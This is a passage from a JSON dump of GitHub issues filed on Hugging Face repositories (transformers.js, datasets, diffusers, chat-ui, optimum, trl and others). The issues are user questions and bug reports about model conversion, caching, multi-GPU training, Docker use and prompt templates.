"https://github.com/huggingface/optimum/issues/1334", "state": "closed", "labels": [], "created_at": "2023-09-01T15:56:27Z", "updated_at": "2023-09-13T11:43:36Z", "comments": 3, "user": "mgoin" }, { "repo": "huggingface/transformers.js", "number": 274, "title": "[Question]\u00a0How to convert to ONNX a fine-tuned model", "body": "Hi, we're playing with this library to see if it can be useful for our project. I find it very easy and well done (congratulations).\r\n\r\nThe idea is not to use it directly as a frontend library but via node.js. \r\nWe've tried scripting a model directly from HF (google/flan-t5-small) and it worked but we're having trouble using a fine-tuned model.\r\n\r\nHere what we tried. We fine-tuned a model (again google/flan-t5-small) and then converted it using the onnx script (in README.md).\r\n\r\nThe script generated the following files:\r\n\r\n```\r\nonnx/decoder_model_quantized.onnx\r\nonnx/decoder_model.onnx\r\nonnx/encoder_model_quantized.onnx\r\nonnx/encoder_model.onnx\r\nconfig.json\r\ngeneration_config.json\r\nquantize_config.json\r\nspecial_tokens_map.json\r\nspice.model\r\ntokenizer_config.json\r\ntokenizer.json\r\n```\r\n\r\nBut when we tried to use it it gave us this error:\r\n\r\n`local_files_only=true` or `env.allowRemoteModels=false` and file was not found locally at ./models/google/flan-t5-small-2/onnx/decoder_model_merged_quantized.onnx\r\n\r\nSome advice or useful doc/link? \r\nThanks", "url": "https://github.com/huggingface/transformers.js/issues/274", "state": "open", "labels": [ "question" ], "created_at": "2023-09-01T15:27:21Z", "updated_at": "2023-09-01T16:12:12Z", "user": "mrddter" }, { "repo": "huggingface/datasets", "number": 6203, "title": "Support loading from a DVC remote repository", "body": "### Feature request\n\nAdding support for loading a file from a DVC repository, tracked remotely on a SCM.\n\n### Motivation\n\nDVC is a popular version control system to version and manage datasets. The files are stored on a remote object storage platform, but they are tracked using Git. Integration with DVC is possible through the `DVCFileSystem`.\r\n\r\nI have a Gitlab repository where multiple files are tracked using DVC and stored in a GCP bucket. I would like to be able to load these files using `datasets` directly using an URL. My goal is to write a generic code that abstracts the storage layer, such that my users will only have to pass in an `fsspec`-compliant URL and the corresponding files will be loaded.\n\n### Your contribution\n\nI managed to instantiate a `DVCFileSystem` pointing to a Gitlab repo from a `fsspec` chained URL in [this pull request](https://github.com/iterative/dvc/pull/9903) to DVC. \r\n\r\n```python\r\nfrom fsspec.core import url_to_fs\r\n\r\nfs, _ = url_to_fs(\"dvc::https://gitlab.com/repository/group/my-repo\")\r\n```\r\n\r\nFrom now I'm not sure how to continue, it seems that `datasets` expects the URL to be fully qualified like so: `dvc::https://gitlab.com/repository/group/my-repo/my-folder/my-file.json` but this fails because `DVCFileSystem` expects the URL to point to the root of an SCM repo. Is there a way to make this work with `datasets`?", "url": "https://github.com/huggingface/datasets/issues/6203", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-09-01T14:04:52Z", "updated_at": "2023-09-15T15:11:27Z", "comments": 4, "user": "bilelomrani1" }, { "repo": "huggingface/optimum", "number": 1328, "title": "Documentation for OpenVINO missing half() ", "body": "### System Info\n\n```shell\nN/A\n```\n\n\n### Who can help?\n\n@echarlaix \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe documentation for OpenVINO is missing information does not have any information about using `half()` to run models on GPU. The docs used to have this information, but it was removed. \r\n\r\nIs this not required anymore? I.e. perhaps `model.to(\"GPU\")` does this automatically? If so, how would one run on GPU with FP32 precision?\n\n### Expected behavior\n\nhalf() documented with a small example", "url": "https://github.com/huggingface/optimum/issues/1328", "state": "closed", "labels": [ "bug" ], "created_at": "2023-08-31T20:44:28Z", "updated_at": "2023-08-31T20:46:34Z", "comments": 1, "user": "ngaloppo" }, { "repo": "huggingface/autotrain-advanced", "number": 249, "title": "How to save model locally after sft", "body": "I am wondering how to save model locally after sft", "url": "https://github.com/huggingface/autotrain-advanced/issues/249", "state": "closed", "labels": [], "created_at": "2023-08-31T14:59:04Z", "updated_at": "2023-08-31T17:01:44Z", "user": "Diego0511" }, { "repo": "huggingface/chat-ui", "number": 425, "title": "Is it possible to modify it so that .env.local environment variables are set at runtime?", "body": "Currently for every different deployment of Chat-UI it is required to rebuild the Docker image with different .env.local environment variables. Is it theoretically possible to have it so that 1 image can be used for all deployments, but with different secrets passed at runtime? What environment variables and for what reason are truly needed at build time for Chat-UI to function? In #204 it says `HF_ACCESS_TOKEN` is needed at build time, but what if we use `OPENID` authentication instead? Is there anything else blocking this type of use case?", "url": "https://github.com/huggingface/chat-ui/issues/425", "state": "open", "labels": [ "enhancement", "back", "hacktoberfest" ], "created_at": "2023-08-31T12:55:17Z", "updated_at": "2024-03-14T20:05:38Z", "comments": 4, "user": "martinkozle" }, { "repo": "huggingface/text-generation-inference", "number": 959, "title": "How to enter the docker image to modify the environment", "body": "### System Info\n\ndokcer image: ghcr.io/huggingface/text-generation-inference:1.0.2\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [X] My own modifications\n\n### Reproduction\n\nI want to enter the image to modify the environment\uff0clike: tiktoken.\r\n\r\n`docker run -it ghcr.io/huggingface/text-generation-inference:1.0.2 /bin/bash`\r\n\r\nI get:\r\nerror: unexpected argument '/bin/bash' found\r\nUsage: text-generation-launcher [OPTIONS]\r\n\n\n### Expected behavior\n\nno error\r\nthx!", "url": "https://github.com/huggingface/text-generation-inference/issues/959", "state": "closed", "labels": [], "created_at": "2023-08-31T11:14:13Z", "updated_at": "2023-08-31T20:12:55Z", "user": "Romaosir" }, { "repo": "huggingface/safetensors", "number": 352, "title": "Attempt to convert `PygmalionAI/pygmalion-2.7b` to `safetensors`", "body": "### System Info\n\n- `transformers` version: 4.32.1\r\n- Platform: Linux-5.15.0-1039-gcp-x86_64-with-glibc2.31\r\n- Python version: 3.9.5\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.3\r\n- Accelerate version: 0.20.3\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.0.1+cu118 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: no\r\n- Using distributed or parallel set-up in script?: no\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Reproduction\n\nHey guys I am trying to save the `PygmalionAI/pygmalion-2.7b` weights to `safetensors`. Based on [this thread](https://github.com/huggingface/text-generation-inference/issues/922#issuecomment-1698942643) I have manually downloaded the [weights](https://huggingface.co/PygmalionAI/pygmalion-2.7b/resolve/main/pytorch_model.bin) and tried to run the following:\r\n```\r\nweights = torch.load(\"pytorch_model.bin\")\r\nweights = {k: v.clone().contiguous() for k, v in weights.items()}\r\nsave_file(weights, \"model.safetensors\")\r\n```\r\nand everything went well. However, when trying to load the model I encounter the following issue:\r\n```\r\nAttributeError: 'NoneType' object has no attribute 'get'\r\n```\r\nI inspected the files and can't figure out what goes wrong... I have pushed everything to `https://huggingface.co/JulesBelveze/pygmalion-2.7b-safetensors`\r\n\r\nAny recommendation on how to proceed would be awesome \ud83e\udd13 \r\nCheers!\n\n### Expected behavior\n\nExpecting the following code snippet to load properly load the model (and not throw the above error)\r\n```\r\nfrom transformers import AutoModelForCausalLM\r\nmodel = AutoModelForCausalLM.from_pretrained(\"JulesBelveze/pygmalion-2.7b-safetensors\")\r\n```\r\n", "url": "https://github.com/huggingface/safetensors/issues/352", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-08-31T10:25:19Z", "updated_at": "2023-12-11T01:48:45Z", "comments": 2, "user": "JulesBelveze" }, { "repo": "huggingface/autotrain-advanced", "number": 246, "title": "how to load the fine-tuned model in the local? ", "body": "hi \r\nthz for your super convenient package makes easier for cookies like me to fine-tune a new model. However, as a cookie, I dont really know how to load my fine-tuned model and apply. \r\nI was fine-tuning in Google colab and download on my PC but know how to call it out? \r\nthz bro ", "url": "https://github.com/huggingface/autotrain-advanced/issues/246", "state": "closed", "labels": [], "created_at": "2023-08-31T08:15:11Z", "updated_at": "2023-12-18T15:31:11Z", "user": "kennyluke1023" }, { "repo": "huggingface/diffusers", "number": 4849, "title": "how to use multiple GPUs to train textual inversion?", "body": "\r\nI train the textual inversion fine tuning cat toy example from [here](https://github.com/huggingface/diffusers/tree/main/examples/textual_inversion)\r\n\r\nmy env:\r\ndiffusers: 0.20.0\r\ntorch: 1.12.1+cu113\r\naccelerate: 0.22.0\r\n\r\ntrain script, as follow:\r\n\r\n```\r\nCUDA_VISIBLE_DEVICES=\"0,1,2,3\" python -u textual_inversion.py --pretrained_model_name_or_path=$MODEL_NAME --train_data_dir=$DATA_DIR --learnable_property=\"object\" --placeholder_token=\"\" --initializer_token=\"toy\" --resolution=512 --train_batch_size=1 --gradient_accumulation_steps=4 --max_train_steps=3000 --learning_rate=5.0e-04 --scale_lr --lr_scheduler=\"constant\" --lr_warmup_steps=0 --output_dir=\"textual_inversion_cat\"\r\n```\r\n\r\nBut it only trained in cuda:0, Is there any way to solve the problem of training on a multi gpus\uff1fThanks.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4849", "state": "closed", "labels": [], "created_at": "2023-08-31T02:56:39Z", "updated_at": "2023-09-11T01:07:49Z", "user": "Adorablepet" }, { "repo": "huggingface/chat-ui", "number": 423, "title": "AI response appears without user message, then both appear after refresh.", "body": "I was experimenting with my own back-end and was wanting to get a feel for the interface. Here is what my code looks like:\r\n```py\r\nimport json\r\nimport random\r\nfrom fastapi import FastAPI, Request\r\nfrom fastapi.responses import Response, StreamingResponse\r\n\r\napp = FastAPI()\r\n\r\n\r\nasync def yielder():\r\n yield \"data:\" + json.dumps(\r\n {\r\n \"details\": {\r\n \"finish_reason\": \"length\",\r\n \"generated_tokens\": 1,\r\n \"seed\": None,\r\n },\r\n \"generated_text\": \"what is happening\",\r\n \"token\": {\"id\": random.randrange(0, 2**32), \"logprob\": -0.34, \"special\": False, \"text\": \"it's alive!\"},\r\n },separators=(',', ':')\r\n ) + \"\\n\\n\\n\"\r\n\r\n\r\n@app.post(\"/generate\")\r\n@app.post(\"/\")\r\nasync def generate(request: Request):\r\n reqj = await request.json()\r\n print(reqj)\r\n return StreamingResponse(\r\n yielder(),\r\n media_type=\"text/event-stream\",\r\n headers={\"Content-Type\": \"text/event-stream\"},\r\n )\r\n```\r\nUpon sending a message, \"hi\", I get this:\r\n![image](https://github.com/huggingface/chat-ui/assets/40547702/f3751e35-81a0-4a2d-8e85-2063b3df41c0) \r\nAfter refreshing the page, everything is rendered properly: \r\n![image](https://github.com/huggingface/chat-ui/assets/40547702/b18ce772-b0a4-4959-8d96-346a79aebe6d)\r\n\r\nWhat's going on? \r\nHere is what I used as a reference, which was recommended to me on the HF Discord: [link](https://github.com/gururise/openai_text_generation_inference_server/blob/main/server.py) \r\nThanks in advance.", "url": "https://github.com/huggingface/chat-ui/issues/423", "state": "closed", "labels": [], "created_at": "2023-08-30T19:04:14Z", "updated_at": "2023-09-13T19:44:23Z", "comments": 5, "user": "konst-aa" }, { "repo": "huggingface/datasets", "number": 6195, "title": "Force to reuse cache at given path", "body": "### Describe the bug\n\nI have run the official example of MLM like:\r\n\r\n```bash\r\n python run_mlm.py \\\r\n --model_name_or_path roberta-base \\\r\n --dataset_name togethercomputer/RedPajama-Data-1T \\\r\n --dataset_config_name arxiv \\\r\n --per_device_train_batch_size 10 \\\r\n --preprocessing_num_workers 20 \\\r\n --validation_split_percentage 0 \\\r\n --cache_dir /project/huggingface_cache/datasets \\\r\n --line_by_line \\\r\n --do_train \\\r\n --pad_to_max_length \\\r\n --output_dir /project/huggingface_cache/test-mlm\r\n```\r\nit successfully runs and at my cache folder has `cache-1982fea76aa54a13_00001_of_00020.arrow`..... `cache-1982fea76aa54a13_00020_of_00020.arrow ` as tokenization cache of `map` method. And the cache works fine every time I run the command above.\r\n\r\nHowever, when I switched to jupyter notebook (since I do not want to load datasets every time when I changed other parameters not related to the dataloading). It is not recognizing the cache files and starts to re-run the entire tokenization process. \r\n\r\nI changed my code to \r\n```python\r\ntokenized_datasets = raw_datasets[\"train\"].map(\r\n tokenize_function,\r\n batched=True,\r\n num_proc=data_args.preprocessing_num_workers,\r\n remove_columns=[text_column_name],\r\n load_from_cache_file=True,\r\n desc=\"Running tokenizer on dataset line_by_line\",\r\n # cache_file_names= {\"train\": \"cache-1982fea76aa54a13.arrow\"}\r\n cache_file_name=\"cache-1982fea76aa54a13.arrow\",\r\n new_fingerprint=\"1982fea76aa54a13\"\r\n )\r\n```\r\nit still does not recognize the previously cached files and trying to re-run the tokenization process.\n\n### Steps to reproduce the bug\n\nuse jupyter notebook for dataset map function.\n\n### Expected behavior\n\nthe map function accepts the given cache_file_name and new_fingerprint then load the previously cached files.\n\n### Environment info\n\n- `datasets` version: 2.14.4.dev0\r\n- Platform: Linux-3.10.0-1160.59.1.el7.x86_64-x86_64-with-glibc2.10\r\n- Python version: 3.8.8\r\n- Huggingface_hub version: 0.16.4\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3", "url": "https://github.com/huggingface/datasets/issues/6195", "state": "closed", "labels": [], "created_at": "2023-08-30T18:44:54Z", "updated_at": "2023-11-03T10:14:21Z", "comments": 2, "user": "Luosuu" }, { "repo": "huggingface/trl", "number": 713, "title": "How to use custom evaluate function with multi-gpu deepspeed", "body": "I am trying to use `deepspeed` multi-gpu training with `SFTTrainer` for a hh-rlhf. My modified trainer looks something like this\r\n```python\r\nclass SFTCustomEvalTrainer(SFTTrainer):\r\n\r\n def evaluate(\r\n self,\r\n eval_dataset = None,\r\n ignore_keys = None,\r\n metric_key_prefix: str = \"eval\",\r\n ):\r\n breakpoint()\r\n .... custom eval code\r\n```\r\nHowever, I only want to run one instance of evaluate on the 0th GPU. When using `--nproc_per_node 2`, I get two processes entering the breakpoint in customized `evaluate` function. How can I restrict deepspeed to only use one GPU for evaluation and multi-gpu for training?", "url": "https://github.com/huggingface/trl/issues/713", "state": "closed", "labels": [], "created_at": "2023-08-30T17:33:40Z", "updated_at": "2023-11-10T15:05:23Z", "user": "abaheti95" }, { "repo": "huggingface/optimum", "number": 1323, "title": "Optimisation and Quantisation for Translation models / tasks", "body": "### Feature request\n\nCurrently, the opimisation and quantisation functions look for mode.onnx in a folder, and will perform opt and quant on those files. When exporting a translation targeted ONNX, multiple files for encoding and decoding, and these can't be optimised or quantised. \r\n\r\nI've tried a hacky approach to change names of each of these files and then applying opt and quant, and this fails. I suspect it's more than just namings.\r\n\r\nIs it possible to optimise and quant translation ONNX files in future?\n\n### Motivation\n\nI would like to get smaller more efficient translation models\n\n### Your contribution\n\nNothing really that I can contribute to building the solution, as I don't have that level of experience and understanding.", "url": "https://github.com/huggingface/optimum/issues/1323", "state": "closed", "labels": [], "created_at": "2023-08-30T06:36:17Z", "updated_at": "2023-09-29T00:47:39Z", "comments": 2, "user": "gidzr" }, { "repo": "huggingface/datasets", "number": 6193, "title": "Dataset loading script method does not work with .pyc file", "body": "### Describe the bug\n\nThe huggingface dataset library specifically looks for \u2018.py\u2019 file while loading the dataset using loading script approach and it does not work with \u2018.pyc\u2019 file.\r\nWhile deploying in production, it becomes an issue when we are restricted to use only .pyc files. Is there any work around for this ?\n\n### Steps to reproduce the bug\n\n1. Create a dataset loading script to read the custom data.\r\n2. compile the code to make sure that .pyc file is created \r\n3. Delete the loading script and re-run the code. Usually, python should make use of complied .pyc files. However, in this case, the dataset library errors out with the message that it's unable to find the data loader loading script.\n\n### Expected behavior\n\nThe code should make use of .pyc file and run without any error.\n\n### Environment info\n\nNA", "url": "https://github.com/huggingface/datasets/issues/6193", "state": "open", "labels": [], "created_at": "2023-08-29T19:35:06Z", "updated_at": "2023-08-31T19:47:29Z", "comments": 3, "user": "riteshkumarumassedu" }, { "repo": "huggingface/transformers.js", "number": 270, "title": "[Question] How to stop warning log", "body": "I am using NodeJS to serve a translation model.\r\nThere are so many warning log when translation processing. How to stop this?\r\n`2023-08-29 23:04:32.061 node[3167:31841] 2023-08-29 23:04:32.061977 [W:onnxruntime:, graph.cc:3490 CleanUnusedInitializersAndNodeArgs] Removing initializer '/model/decoder/layers.2/encoder_attn_layer_norm/Constant_output_0'. It is not used by any node and should be removed from the model.\r\n2023-08-29 23:04:32.061 node[3167:31841] 2023-08-29 23:04:32.061987 [W:onnxruntime:, graph.cc:3490 CleanUnusedInitializersAndNodeArgs] Removing initializer '/model/decoder/layers.0/encoder_attn_layer_norm/Constant_output_0'. It is not used by any node and should be removed from the model.\r\n2023-08-29 23:04:32.062 node[3167:31841] 2023-08-29 23:04:32.061997 [W:onnxruntime:, graph.cc:3490 CleanUnusedInitializersAndNodeArgs] Removing initializer '/model/decoder/layers.4/self_attn_layer_norm/Constant_1_output_0'. It is not used by any node and should be removed from the model.`", "url": "https://github.com/huggingface/transformers.js/issues/270", "state": "open", "labels": [ "question" ], "created_at": "2023-08-29T16:08:41Z", "updated_at": "2025-08-02T15:48:45Z", "user": "tuannguyen90" }, { "repo": "huggingface/chat-ui", "number": 420, "title": "Error: ENOSPC: System limit for number of file watchers reached", "body": "Error: ENOSPC: System limit for number of file watchers reached, watch '/home/alvyn/chat-ui/vite.config.ts'\r\n at FSWatcher. (node:internal/fs/watchers:247:19)\r\n at Object.watch (node:fs:2418:34)\r\n at createFsWatchInstance (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50470:17)\r\n at setFsWatchListener (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50517:15)\r\n at NodeFsHandler._watchWithNodeFs (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50672:14)\r\n at NodeFsHandler._handleFile (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50736:23)\r\n at NodeFsHandler._addToNodeFs (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50978:21)\r\n at async file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:51973:21\r\n at async Promise.all (index 1)\r\nEmitted 'error' event on FSWatcher instance at:\r\n at FSWatcher._handleError (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:52169:10)\r\n at NodeFsHandler._addToNodeFs (file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:50986:18)\r\n at async file:///home/alvyn/chat-ui/node_modules/vite/dist/node/chunks/dep-e8f070e8.js:51973:21\r\n at async Promise.all (index 1) {\r\n errno: -28,\r\n syscall: 'watch',\r\n code: 'ENOSPC',\r\n path: '/home/alvyn/chat-ui/vite.config.ts',\r\n filename: '/home/alvyn/chat-ui/vite.config.ts'\r\n}\r\n", "url": "https://github.com/huggingface/chat-ui/issues/420", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-29T14:54:49Z", "updated_at": "2023-09-20T15:11:26Z", "comments": 2, "user": "alvynabranches" }, { "repo": "huggingface/transformers.js", "number": 268, "title": "[Question] Chunks from transcription always empty text", "body": "This example works fine: \r\n![image](https://github.com/xenova/transformers.js/assets/216566/970c3828-8fbf-4539-843d-a96554c72f4b)\r\n\r\nBut ATM I am sending Float32 to the worker here (i also confirm the audio is valid by playing it back)\r\nhttps://github.com/quantuminformation/coherency/blob/main/components/audio-recorder.js#L104\r\n\r\nBut after transcribing here:\r\nhttps://github.com/quantuminformation/coherency/blob/main/worker.js#L140\r\n\r\nmy chunks only contain `\"\"`\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/216566/04588e73-2ee5-4f39-a145-f4e87c392ba1)\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/216566/febe2809-0fa7-4e21-8b71-d5724a391644)\r\n\r\nany ideas where my setup is going wrong?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/268", "state": "open", "labels": [ "question" ], "created_at": "2023-08-29T13:49:00Z", "updated_at": "2023-11-04T19:48:30Z", "user": "quantuminformation" }, { "repo": "huggingface/diffusers", "number": 4831, "title": "How to preview the image during generation,any demo for gradio?", "body": "How to preview the image during generation,any demo for gradio?", "url": "https://github.com/huggingface/diffusers/issues/4831", "state": "closed", "labels": [], "created_at": "2023-08-29T13:32:07Z", "updated_at": "2023-08-30T15:31:31Z", "user": "wodsoe" }, { "repo": "huggingface/transformers.js", "number": 267, "title": "[Question] multilingual-e5-* models don't work with pipeline", "body": "I just noticed that the `Xenova/multilingual-e5-*` model family doesn't work in the transformers.js pipeline for feature-extraction with your (@xenova) onnx versions on HF.\r\n\r\nMy code throws an error.\r\n\r\n```Javascript\r\nimport { pipeline } from 'https://cdn.jsdelivr.net/npm/@xenova/transformers@2.5.4';\r\n\r\nasync function allocatePipeline() {\r\n let pipe = await pipeline(\"feature-extraction\", \"Xenova/multilingual-e5-small\");\r\n let out = await pipe(\"I love transformers\", { pooling: 'mean', normalize: false });\r\n\r\n document.getElementById(\"output\").innerHTML = out.data;\r\n}\r\n\r\nallocatePipeline();\r\n```\r\n\r\nLive example [here](https://geo.rocks/minimal-transformersjs-example-gte).\r\n\r\n```\r\nUncaught (in promise) Error: An error occurred during model execution: \"Missing the following inputs: token_type_ids.\r\n at transformers@2.5.4:70:5612\r\n at y (transformers@2.5.4:70:5971)\r\n at M (transformers@2.5.4:70:8450)\r\n at transformers@2.5.4:70:10792\r\n at Function.forward (transformers@2.5.4:70:10799)\r\n at Function._call (transformers@2.5.4:70:10675)\r\n at Function.e [as model] (transformers@2.5.4:88:508)\r\n at Function._call (transformers@2.5.4:73:1424)\r\n at Function._call (transformers@2.5.4:73:6152)\r\n at e (transformers@2.5.4:88:508)\r\n```\r\n\r\nHowever, HF user Supabase converted the models differently so that they are actually usable with the pipeline, e.g. [gte-small](https://huggingface.co/Supabase/gte-small#javascript). I noticed that Supabase added the vocab.txt file - is it possible that this or other files are missing in your versions or is there a more complex reason for this?\r\n\r\nI'm pretty interested in the gte family as they are the most performant small models currently available (according to the MTEB leaderboard).", "url": "https://github.com/huggingface/transformers.js/issues/267", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-29T12:39:26Z", "updated_at": "2023-08-30T12:05:02Z", "user": "do-me" }, { "repo": "huggingface/transformers", "number": 25803, "title": "[Model] How to evaluate Idefics Model's ability with in context examples?", "body": "Hi the recent release of Idefics-9/80B-Instruct model is superbly promising! \r\n\r\nWe would like to evaluate them on a customized benchmarks with in context examples. May I ask how should I arrange the prompt template, especially for `instruct` version? \r\n\r\nWe had some problems previously when evaluating the model on single images, the model will ramble and wont stop, but managed to resolve them somehow.\r\n\r\nFor single image we use the template to evaluate instruct version model.\r\n```\r\nUser:{prompt} Assistant:\r\n```\r\n\r\nWould it be perfectly correct (matching your training template?) or do you have better recommendation. Sorry we have a customized pipeline so it's not easy to adopt your designed `IdeficsProcessor`. \ud83d\ude2d\r\n\r\nAlso we migrate the code on `image_attention_mask` with \r\n```\r\n# supporting idefics processing\r\ndef get_formatted_prompt(prompt: str=\"\", in_context_prompts: list = []) -> str:\r\n # prompts = [\r\n # \"User:\",\r\n # \"https://hips.hearstapps.com/hmg-prod/images/cute-photos-of-cats-in-grass-1593184777.jpg\",\r\n # \"Describe this image.\\nAssistant: An image of two kittens in grass.\\n\",\r\n # \"User:\",\r\n # \"http://images.cocodataset.org/train2017/000000190081.jpg\",\r\n # \"Describe this image.\\nAssistant:\",\r\n # ]\r\n # prompts = f\"User:{prompt} Assistant:\"\r\n prompts = f\"User:{prompt} Assistant:\"\r\n return prompts\r\n\r\ndef get_image_attention_mask(output_input_ids, max_num_images, tokenizer, include_image=True):\r\n # image_attention_mask, _ = image_attention_mask_for_packed_input_ids(output_input_ids, tokenizer)\r\n # image_attention_mask = incremental_to_binary_attention_mask(image_attention_mask, num_classes=max_num_images)\r\n if include_image:\r\n image_attention_mask, _ = image_attention_mask_for_packed_input_ids(output_input_ids, tokenizer)\r\n image_attention_mask = incremental_to_binary_attention_mask(\r\n image_attention_mask, num_classes=max_num_images\r\n )\r\n else:\r\n # in full language mode we set the image mask to all-0s\r\n image_attention_mask = torch.zeros(\r\n output_input_ids.shape[0], output_input_ids.shape[1], 1, dtype=torch.bool\r\n )\r\n return image_attention_mask\r\n\r\nlang_x = self.tokenizer(\r\n [\r\n get_formatted_prompt(question, []),\r\n ],\r\n return_tensors=\"pt\",\r\n)\r\nimage_attention_mask = get_image_attention_mask(lang_x['input_ids'], 1, self.tokenizer)\r\n```\r\n\r\nI have read all related blogs and docs but still got confused about the usage of ``. Is it used to break the in context examples with query example? \r\n\r\nMy guess is\r\n```\r\nUser:{in_context_prompt} Assistant: {in_context_answer} User:{prompt} Assistant:\r\n```\r\n\r\nBesides, very curious that the model would generate the normal `` at the last of sentence instead of normal llama's `<|endofchunk|>`?\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/25803", "state": "closed", "labels": [], "created_at": "2023-08-28T19:39:02Z", "updated_at": "2023-10-11T08:06:48Z", "user": "Luodian" }, { "repo": "huggingface/chat-ui", "number": 417, "title": "CodeLlama Instruct Configuration", "body": "Hello Guys, \r\n\r\nCould you guide me in the right direction to get the configuration of the Code Llama Instruct model right? \r\n\r\nI have this config so far: \r\n\r\n```\r\n {\r\n \"name\": \"Code Llama\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:8080\"}],\r\n \"description\": \"Programming Assistant\",\r\n \"userMessageToken\": \"[INST]\",\r\n \r\n \"assistantMessageToken\": \"[/INST]\",\r\n\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1048\r\n }\r\n }\r\n```\r\n\r\nThe model starts with the \"right\" output, but then it produces garbage. \r\n\r\nI am running the TGI backend. \r\n\r\nThx!", "url": "https://github.com/huggingface/chat-ui/issues/417", "state": "open", "labels": [ "support", "models" ], "created_at": "2023-08-28T13:42:09Z", "updated_at": "2023-09-13T18:17:50Z", "comments": 9, "user": "schauppi" }, { "repo": "huggingface/transformers.js", "number": 265, "title": "Unexpected token", "body": "I added this code to my React project. \r\n\r\n```\r\nimport { pipeline } from \"@xenova/transformers\";\r\n\r\nasync function sentimentAnalysis() {\r\n // Allocate a pipeline for sentiment-analysis\r\n let pipe = await pipeline(\"sentiment-analysis\");\r\n let out = await pipe(\"I love transformers!\");\r\n console.log(out);\r\n}\r\n\r\nsentimentAnalysis();\r\n```\r\nI am surprised the docs don't tell me to download a model, so I think this code will auto-download it... anyway I get this issue...\r\n./node_modules/@xenova/transformers/src/env.js 38:84\r\nModule parse failed: Unexpected token (38:84)\r\nFile was processed with these loaders:\r\n * ./node_modules/babel-loader/lib/index.js\r\nYou may need an additional loader to handle the result of these loaders.\r\n| \r\n| var RUNNING_LOCALLY = FS_AVAILABLE && PATH_AVAILABLE;\r\n> var __dirname = RUNNING_LOCALLY ? path.dirname(path.dirname(url.fileURLToPath(import.meta.url))) : './';\r\n| \r\n| // Only used for environments with access to file system\r\n\r\n\r\nSeems like I need access to the filesystem... but that can't be right because this runs in the browser ... ?", "url": "https://github.com/huggingface/transformers.js/issues/265", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-28T13:34:42Z", "updated_at": "2023-08-28T16:00:10Z", "user": "patrickinminneapolis" }, { "repo": "huggingface/diffusers", "number": 4814, "title": "How to add more weight to the text prompt in ControlNet?", "body": "Hi,\r\n\r\nI want to know if there is a quick way of adding more weight to the text prompt in ControlNet during inference.\r\nIf so, which parameter needs to be changed? \r\n\r\nThanks,", "url": "https://github.com/huggingface/diffusers/issues/4814", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-28T13:05:16Z", "updated_at": "2023-10-30T15:07:45Z", "user": "miquel-espinosa" }, { "repo": "huggingface/autotrain-advanced", "number": 239, "title": "how to start without \" pip install autotrain-advanced\"", "body": "Dear, \r\n\r\nThanks for your work.\r\n\r\nAfter installing through `pip`, running\r\n\r\n**`autotrain llm --train --project_name my-llm --model luodian/llama-7b-hf --data_path . --use_peft --use_int4 --learning_rate 2e-4 --train_batch_size 12 --num_train_epochs 3 --trainer sft`**\r\n\r\ncan achieve fine-tuning on your own data. \r\n\r\nIf I want to run the project from source code for fine-tuning, which function should I start from?\r\nThat is, from which function do the `autotrain` and `llm` parameters come from? \r\n\r\nBest,\r\n", "url": "https://github.com/huggingface/autotrain-advanced/issues/239", "state": "closed", "labels": [], "created_at": "2023-08-28T10:02:37Z", "updated_at": "2023-12-18T15:30:42Z", "user": "RedBlack888" }, { "repo": "huggingface/datasets", "number": 6186, "title": "Feature request: add code example of multi-GPU processing", "body": "### Feature request\r\n\r\nWould be great to add a code example of how to do multi-GPU processing with \ud83e\udd17 Datasets in the documentation. cc @stevhliu\r\n\r\nCurrently the docs has a small [section](https://huggingface.co/docs/datasets/v2.3.2/en/process#map) on this saying \"your big GPU call goes here\", however it didn't work for me out-of-the-box.\r\n\r\nLet's say you have a PyTorch model that can do translation, and you have multiple GPUs. In that case, you'd like to duplicate the model on each GPU, each processing (translating) a chunk of the data in parallel.\r\n\r\nHere's how I tried to do that:\r\n\r\n```\r\nfrom datasets import load_dataset\r\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer\r\nfrom multiprocess import set_start_method\r\nimport torch\r\nimport os\r\n\r\ndataset = load_dataset(\"mlfoundations/datacomp_small\")\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"facebook/nllb-200-distilled-600M\")\r\nmodel = 